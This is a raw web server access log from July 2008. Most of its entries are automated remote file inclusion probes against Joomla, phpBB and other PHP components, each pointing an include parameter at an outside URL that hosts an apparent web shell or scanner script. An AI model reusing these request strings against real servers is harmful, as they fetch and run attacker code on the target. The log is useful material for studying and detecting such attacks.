63.110.250.75 - - [13/Jul/2008:11:07:23 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.239.223.69 - - [13/Jul/2008:11:07:23 -0700] "GET /logs/access_080128.log/index.php?inc_dir=http://www.hotelberberys.pl/includes/domit/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.110.250.75 - - [13/Jul/2008:11:07:23 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.239.223.69 - - [13/Jul/2008:11:07:26 -0700] "GET /index.php?inc_dir=http://www.hotelberberys.pl/includes/domit/ips.txt?? HTTP/1.1" 200 18437 "-" "libwww-perl/5.805" "www.dmulk.com"
218.239.223.69 - - [13/Jul/2008:11:07:26 -0700] "GET /logs/index.php?inc_dir=http://www.hotelberberys.pl/includes/domit/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.29.178 - - [13/Jul/2008:11:07:42 -0700] "GET /logs/access_080212.log/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.86.29.178 - - [13/Jul/2008:11:07:44 -0700] "GET /index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 200 18589 "-" "libwww-perl/5.812" "www.dmulk.com"
70.86.29.178 - - [13/Jul/2008:11:07:44 -0700] "GET /logs/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.86.29.178 - - [13/Jul/2008:11:07:53 -0700] "GET /logs/access_080128.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.86.29.178 - - [13/Jul/2008:11:07:53 -0700] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.86.29.178 - - [13/Jul/2008:11:07:53 -0700] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
195.128.50.35 - - [13/Jul/2008:11:08:03 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.128.50.35 - - [13/Jul/2008:11:08:03 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.128.50.35 - - [13/Jul/2008:11:08:04 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.217.156.81 - - [13/Jul/2008:11:08:15 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
217.217.156.81 - - [13/Jul/2008:11:08:15 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.249.67.178 - - [13/Jul/2008:11:08:22 -0700] "GET / HTTP/1.1" 200 18257 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
212.227.29.34 - - [13/Jul/2008:11:08:39 -0700] "GET /logs/access_080112.log/index.php?inc_dir=http://www.leokaris.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.29.34 - - [13/Jul/2008:11:08:44 -0700] "GET /logs/index.php?inc_dir=http://www.leokaris.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.29.34 - - [13/Jul/2008:11:08:45 -0700] "GET /index.php?inc_dir=http://www.leokaris.com/bajo.txt????? HTTP/1.1" 200 18411 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.29.34 - - [13/Jul/2008:11:08:56 -0700] "GET /logs/access_080128.log/index.php?inc_dir=http://www.leokaris.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.110.250.75 - - [13/Jul/2008:11:09:25 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.110.250.75 - - [13/Jul/2008:11:09:25 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.239.223.69 - - [13/Jul/2008:11:09:47 -0700] "GET /logs/access_080112.log/index.php?inc_dir=http://www.hotelberberys.pl/includes/domit/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.29.178 - - [13/Jul/2008:11:10:18 -0700] "GET /logs/access.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.111.176.84 - - [13/Jul/2008:11:10:58 -0700] "GET /logs/access_080128.log/index.php?inc_dir=http://www.leokaris.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.84 - - [13/Jul/2008:11:11:12 -0700] "GET /logs/access_080112.log/index.php?inc_dir=http://www.leokaris.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.248.101.69 - - [13/Jul/2008:11:11:27 -0700] "GET /logs/access_080105.log/index.php?configFile=http://www.guardianbeast.helloweb.eu/idosyris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.101.69 - - [13/Jul/2008:11:11:30 -0700] "GET /logs/index.php?configFile=http://www.guardianbeast.helloweb.eu/idosyris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.101.69 - - [13/Jul/2008:11:11:34 -0700] "GET /index.php?configFile=http://www.guardianbeast.helloweb.eu/idosyris.txt??? HTTP/1.1" 200 18439 "-" "libwww-perl/5.803" "www.dmulk.com"
202.164.225.11 - - [13/Jul/2008:11:11:42 -0700] "GET /logs/access_080218.log/?mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.75.225.10 - - [13/Jul/2008:11:12:22 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://keycell.webs.com/IDscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.75.225.10 - - [13/Jul/2008:11:12:26 -0700] "GET /logs/access_080330.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://keycell.webs.com/IDscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.75.225.10 - - [13/Jul/2008:11:12:26 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://keycell.webs.com/IDscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.125.143.162 - - [13/Jul/2008:11:13:02 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.5678cheer.com/help/ioncube/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.6.18.246 - - [13/Jul/2008:11:13:27 -0700] "GET /bikes/dteel/140CANON/ HTTP/1.0" 200 971 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
210.245.87.117 - - [13/Jul/2008:11:13:44 -0700] "GET //include.php?path=psp/user.php&site=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
210.245.87.117 - - [13/Jul/2008:11:13:46 -0700] "GET /logs//include.php?path=psp/user.php&site=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
89.248.101.69 - - [13/Jul/2008:11:13:49 -0700] "GET /logs/access_080420.log/index.php?configFile=http://www.guardianbeast.helloweb.eu/idosyris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.249.65.213 - - [13/Jul/2008:11:13:57 -0700] "GET /logs/access_080329.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://iconodemexico.com///components/com_mosres/cal/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.249.65.213 - - [13/Jul/2008:11:13:58 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://iconodemexico.com///components/com_mosres/cal/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.249.65.213 - - [13/Jul/2008:11:13:58 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://iconodemexico.com///components/com_mosres/cal/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.249.65.213 - - [13/Jul/2008:11:13:59 -0700] "GET /logs/access_080329.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://iconodemexico.com///components/com_mosres/cal/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.249.65.213 - - [13/Jul/2008:11:13:59 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://iconodemexico.com///components/com_mosres/cal/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.249.65.213 - - [13/Jul/2008:11:13:59 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://iconodemexico.com///components/com_mosres/cal/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.92.144.58 - - [13/Jul/2008:11:14:28 -0700] "GET /logs//?pg=http://jaramadonna.altervista.org/id.txt? HTTP/1.1" 200 55998 "-" "libwww-perl/5.805" "www.dmulk.com"
85.92.144.58 - - [13/Jul/2008:11:14:29 -0700] "GET /logs//?pg=http://jaramadonna.altervista.org/id.txt? HTTP/1.1" 200 55998 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.18.246 - - [13/Jul/2008:11:14:31 -0700] "GET /retreat1/?S=D HTTP/1.0" 200 15065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.92.144.58 - - [13/Jul/2008:11:14:34 -0700] "GET //?pg=http://jaramadonna.altervista.org/id.txt? HTTP/1.1" 200 18377 "-" "libwww-perl/5.805" "www.dmulk.com"
85.92.144.58 - - [13/Jul/2008:11:14:35 -0700] "GET //?pg=http://jaramadonna.altervista.org/id.txt? HTTP/1.1" 200 18377 "-" "libwww-perl/5.805" "www.dmulk.com"
58.227.193.211 - - [13/Jul/2008:11:14:58 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.211 - - [13/Jul/2008:11:14:58 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.164.225.11 - - [13/Jul/2008:11:15:02 -0700] "GET /logs/access_080212.log/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.164.225.11 - - [13/Jul/2008:11:15:05 -0700] "GET /index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 200 18581 "-" "libwww-perl/5.803" "www.dmulk.com"
202.164.225.11 - - [13/Jul/2008:11:15:06 -0700] "GET /logs/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.93.62.99 - - [13/Jul/2008:11:16:27 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.terrazon.com.ar/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.99 - - [13/Jul/2008:11:16:28 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.terrazon.com.ar/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.151.102.50 - - [13/Jul/2008:11:16:32 -0700] "GET /logs/main.php?x=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.151.102.50 - - [13/Jul/2008:11:16:32 -0700] "GET /main.php?x=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.64 - - [13/Jul/2008:11:16:37 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.189.226 - - [13/Jul/2008:11:16:51 -0700] "GET /logs/theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.57.189.226 - - [13/Jul/2008:11:16:56 -0700] "GET /theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.75.225.10 - - [13/Jul/2008:11:17:46 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://keycell.webs.com/IDscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.75.225.10 - - [13/Jul/2008:11:17:56 -0700] "GET /logs/access_080330.log//modules/vwar/admin/admin.php?vwar_root=http://keycell.webs.com/IDscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.75.225.10 - - [13/Jul/2008:11:17:56 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://keycell.webs.com/IDscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:11:18:00 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:11:18:00 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
212.117.89.191 - - [13/Jul/2008:11:18:03 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.117.89.191 - - [13/Jul/2008:11:18:03 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:11:18:05 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
194.143.183.8 - - [13/Jul/2008:11:18:31 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.25.149.45 - - [13/Jul/2008:11:18:33 -0700] "GET /logs/access_080315.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.45 - - [13/Jul/2008:11:18:44 -0700] "GET /logs/access_080225.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.143.233.40 - - [13/Jul/2008:11:18:51 -0700] "GET /logs/access_071103.log/index.php?option=com_joomlaxplorer&Itemid=&mosConfig_absolute_path=http://www.terrazon.com.ar/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.29.178 - - [13/Jul/2008:11:18:56 -0700] "GET /logs/access_080218.log//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.86.29.178 - - [13/Jul/2008:11:18:56 -0700] "GET //language/lang_english/lang_main_album.php?phpbb_root_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.86.29.178 - - [13/Jul/2008:11:18:57 -0700] "GET /logs//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
68.142.212.191 - - [13/Jul/2008:11:19:01 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Yahoo-MMCrawler/4.0; mailto:vertical-crawl-support@yahoo-inc.com)" "dmulk.com"
68.142.212.191 - - [13/Jul/2008:11:19:01 -0700] "GET /blog/wp-content/uploads/picture-015-800x600.jpg HTTP/1.0" 200 160195 "-" "Mozilla/5.0 (Yahoo-MMCrawler/4.0; mailto:vertical-crawl-support@yahoo-inc.com)" "dmulk.com"
212.143.233.40 - - [13/Jul/2008:11:19:15 -0700] "GET /logs/access_080212.log/index.php?option=com_joomlaxplorer&Itemid=&mosConfig_absolute_path=http://www.terrazon.com.ar/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.29.178 - - [13/Jul/2008:11:19:36 -0700] "GET /logs/access_071224.log//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
194.143.183.8 - - [13/Jul/2008:11:20:11 -0700] "GET //components/errors.php?error=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.143.183.8 - - [13/Jul/2008:11:20:14 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
116.125.113.115 - - [13/Jul/2008:11:20:25 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
116.125.113.115 - - [13/Jul/2008:11:20:26 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
202.164.225.11 - - [13/Jul/2008:11:21:05 -0700] "GET /logs/access_080313.log//admin/business_inc/saveserver.php?thisdir=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.164.225.11 - - [13/Jul/2008:11:21:05 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.164.225.11 - - [13/Jul/2008:11:21:05 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.79.75.195 - - [13/Jul/2008:11:21:12 -0700] "GET /logs//index.php?config=1&base_datapath=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
64.38.22.250 - - [13/Jul/2008:11:21:15 -0700] "GET /errors.php?error=http://www.iglesialcs.cl/newweb//images/stories/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [13/Jul/2008:11:21:16 -0700] "GET /logs/errors.php?error=http://www.iglesialcs.cl/newweb//images/stories/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [13/Jul/2008:11:21:17 -0700] "GET /logs/access_071225.log/errors.php?error=http://www.iglesialcs.cl/newweb//images/stories/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
194.79.75.195 - - [13/Jul/2008:11:21:18 -0700] "GET //index.php?config=1&base_datapath=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 200 18467 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
64.38.22.250 - - [13/Jul/2008:11:21:27 -0700] "GET /logs/access_080118.log/errors.php?error=http://www.iglesialcs.cl/newweb//images/stories/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
210.245.87.117 - - [13/Jul/2008:11:21:29 -0700] "GET /logs/?REX[INCLUDE_PATH]=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 200 55993 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
210.245.87.117 - - [13/Jul/2008:11:21:31 -0700] "GET /?REX[INCLUDE_PATH]=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 200 18423 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
62.141.56.49 - - [13/Jul/2008:11:21:43 -0700] "GET /logs/access_080329.log/encapscms_PATH/core/core.php?root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.49 - - [13/Jul/2008:11:21:44 -0700] "GET /encapscms_PATH/core/core.php?root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.49 - - [13/Jul/2008:11:21:44 -0700] "GET /logs/encapscms_PATH/core/core.php?root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.28.127.255 - - [13/Jul/2008:11:22:24 -0700] "GET /logs/access_080223.log HTTP/1.1" 200 327680 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "dmulk.com"
70.85.102.132 - - [13/Jul/2008:11:22:25 -0700] "GET /bb_usage_stats/include/bb_usage_stats.php?phpbb_root_path=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
70.85.102.132 - - [13/Jul/2008:11:22:25 -0700] "GET /logs/bb_usage_stats/include/bb_usage_stats.php?phpbb_root_path=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
72.37.237.58 - - [13/Jul/2008:11:22:53 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://jaramadonna.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.37.237.58 - - [13/Jul/2008:11:22:53 -0700] "GET //include/lib.inc.php?site_path=http://jaramadonna.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.37.237.58 - - [13/Jul/2008:11:22:53 -0700] "GET /logs//include/lib.inc.php?site_path=http://jaramadonna.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.37.237.58 - - [13/Jul/2008:11:22:54 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://jaramadonna.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.37.237.58 - - [13/Jul/2008:11:22:54 -0700] "GET //include/lib.inc.php?site_path=http://jaramadonna.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.37.237.58 - - [13/Jul/2008:11:22:54 -0700] "GET /logs//include/lib.inc.php?site_path=http://jaramadonna.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.164.225.11 - - [13/Jul/2008:11:22:57 -0700] "GET /logs/access_080315.log//admin/business_inc/saveserver.php?thisdir=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.65.79 - - [13/Jul/2008:11:23:37 -0700] "GET /logs/access_080128.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.degorzen.nl/Joomla/mambots/editors/htmlarea2/popups/albid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.65.79 - - [13/Jul/2008:11:23:38 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.degorzen.nl/Joomla/mambots/editors/htmlarea2/popups/albid.txt? HTTP/1.1" 500 374 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.65.79 - - [13/Jul/2008:11:23:38 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.degorzen.nl/Joomla/mambots/editors/htmlarea2/popups/albid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.141.56.49 - - [13/Jul/2008:11:23:46 -0700] "GET /logs/encapscms_PATH/core/core.php?root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.49 - - [13/Jul/2008:11:23:46 -0700] "GET /encapscms_PATH/core/core.php?root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.67.25.167 - - [13/Jul/2008:11:23:59 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://www.kita-billstedt.de/willkommen/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
